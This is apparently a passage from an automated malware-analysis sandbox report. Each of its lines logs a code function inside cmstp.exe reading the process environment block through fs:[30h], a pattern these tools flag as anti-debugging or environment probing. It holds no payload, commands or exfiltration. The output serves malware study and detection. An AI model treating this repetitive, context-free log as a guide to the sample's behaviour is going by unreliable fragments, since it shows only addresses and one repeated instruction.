          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050DAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05113D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05153540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05183D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050F7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050D2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050D2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050D2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050D2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050D2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0510FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0510FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05102581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05102581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05102581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05102581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05192D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05192D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05192D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05192D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05192D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05192D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05192D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05101DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05101DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05101DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051035A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051A05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051A05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05156DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05156DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05156DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05156DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05156DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05156DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05188DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050ED5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050ED5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0519FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0519FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0519FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0519FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051A740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051A740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051A740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05191C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05191C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05191C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05191C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05191C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05191C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05191C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05191C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05191C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05191C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05191C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05191C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05191C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05191C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05156C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05156C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05156C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05156C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05103C3E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05103C3E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05103C3E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0510BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0516C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0516C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0510A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050F746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0510AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0510AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0510AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0510AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0510AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0510AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0510AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0510AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0510AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0510AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0510AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05194496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05194496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05194496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05194496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05194496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05194496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05194496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05194496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05194496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05194496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05194496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05194496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05194496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050E849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051A8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051914FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05156CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05156CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05156CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05104710 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0516FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0516FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051A070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051A070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0510A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0510A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0510E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050D4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050D4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05103F33 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FB73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FB73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05191751 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050EEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050EFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051A8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05157794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05157794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05157794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050E8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051137F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0510A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0510A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050DC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050DC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050DC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050F5600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050F5600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050F5600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050F5600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050F5600 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050F5600 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050F5600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050F5600 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050F5600 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050F5600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050F5600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050F5600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050F5600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050F5600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050F5600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050F5600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050F5600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050F5600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050F5600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05108E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05191608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0518FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050DE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050E7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050E7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050E7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050E7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050E7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050E7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0519AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0519AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050E766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0516FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051546A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051A0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051A0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051A0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051A8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05118EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0518FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051036CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050E76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051016E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050D9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050D9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050D9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0510513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0510513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050F4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050F4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050F4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050F4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050F4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050DC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050DB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050DB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05102990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05104190 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050FC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0510A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051061A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051061A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050F99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050F99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050F99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050F99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050F99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050F99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050F99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050F99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050F99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050F99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050F99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050F99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051569A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051949A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051949A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051949A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051949A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050DB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050DB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050DB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051641E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05157016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05157016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_05157016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051A4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_051A4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050EB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050EB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050EB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_050EB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0510002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 16_2_0510002D mov eax, dword ptr fs:[00000030h]
